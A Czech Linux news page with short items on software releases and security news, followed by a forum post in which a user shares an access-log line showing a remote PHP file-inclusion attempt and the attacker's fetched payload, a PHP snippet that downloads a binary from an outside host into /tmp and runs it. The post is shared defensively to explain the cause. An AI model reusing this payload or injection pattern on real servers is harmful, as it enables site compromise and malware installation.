Byla vydána nová verze 25.12.30 svobodného multiplatformního video editoru Shotcut (Wikipedie) postaveného nad multimediálním frameworkem MLT. Shotcut je vedle zdrojových kódů k dispozici také ve formátech AppImage, Flatpak a Snap.
Společnost Valve publikovala přehled To nej roku 2025 ve službě Steam aneb ohlédnutí za nejprodávanějšími, nejhranějšími a dalšími nej hrami roku 2025.
Byly publikovány výsledky průzkumu mezi uživateli Blenderu uskutečněného v říjnu a listopadu 2025. Zúčastnilo se více než 5000 uživatelů.
V dokumentově orientované databázi MongoDB byla nalezena a v upstreamu již opravena kritická bezpečností chyba CVE-2025-14847 aneb MongoBleed.
Při úklidu na Utažské univerzitě se ve skladovacích prostorách náhodou podařilo nalézt magnetickou pásku s kopií Unixu V4. Páska byla zaslána do počítačového muzea, kde se z pásky úspěšně podařilo extrahovat data a Unix spustit. Je to patrně jediný známý dochovaný exemplář tohoto 52 let starého Unixu, prvního vůbec programovaného v jazyce C.
FFmpeg nechal kvůli porušení autorských práv odstranit z GitHubu jeden z repozitářů patřících čínské technologické firmě Rockchip. Důvodem bylo porušení LGPL ze strany Rockchipu. Rockchip byl FFmpegem na porušování LGPL upozorněn již téměř před dvěma roky.
K dispozici je nový CLI nástroj witr sloužící k analýze běžících procesů. Název je zkratkou slov why-is-this-running, 'proč tohle běží'. Klade si za cíl v 'jediném, lidsky čitelném, výstupu vysvětlit odkud daný spuštěný proces pochází, jak byl spuštěn a jaký řetězec systémů je zodpovědný za to, že tento proces právě teď běží'. Witr je napsán v jazyce Go.
Yazi je správce souborů běžící v terminálu. Napsán je v programovacím jazyce Rust. Podporuje asynchronní I/O operace. Vydán byl v nové verzi 25.12.29. Instalovat jej lze také ze Snapcraftu.
Od soboty do úterý probíhá v Hamburku konference 39C3 (Chaos Communication Congress) věnovaná také počítačové bezpečnosti nebo hardwaru. Program (jiná verze) slibuje řadu zajímavých přednášek. Streamy a záznamy budou k dispozici na media.ccc.de.
Byl představen nový Xserver Phoenix, kompletně od nuly vyvíjený v programovacím jazyce Zig. Projekt Phoenix si klade za cíl být moderní alternativou k X.Org serveru.
)
access.log:142.176.141.5 - - [12/Sep/2004:09:19:28 +0200] "GET /index.php?id=http://142.176.141.5:113/ HTTP/1.1" 200 1834
a tohle jsem zkusil:
-bash-2.05b# telnet 142.176.141.5 113
Trying 142.176.141.5...
Connected to 142.176.141.5.
Escape character is '^]'.
GET /
HTTP/1.1 200 OK
Date: Tue, 22 Jun 2004 22:23:39 GMT
Server: Apache
Last-Modified: Thu, 13 May 2004 17:24:53 GMT
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: text/plain
< ? passthru("killall -9 exe dsadas /tmp/dsadas"); \
@unlink("/tmp/dsadas"); $fd = fopen("/tmp/dsadas", "w"); \
if(!$fd) exit; $xx = fopen('http://142.176.141.5/tmp', 'rb');\
while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx);\
fclose($fd); chmod("/tmp/dsadas", 0700); \
passthru("/tmp/dsadas;rm -f /tmp/dsadas"); ? >
Connection closed by foreign host.
-bash-2.05b#
tedy jedna se o to ze uzivatele maji blbe napsane php scripty
(
snad to nekomu pomuze
Tiskni
Sdílej: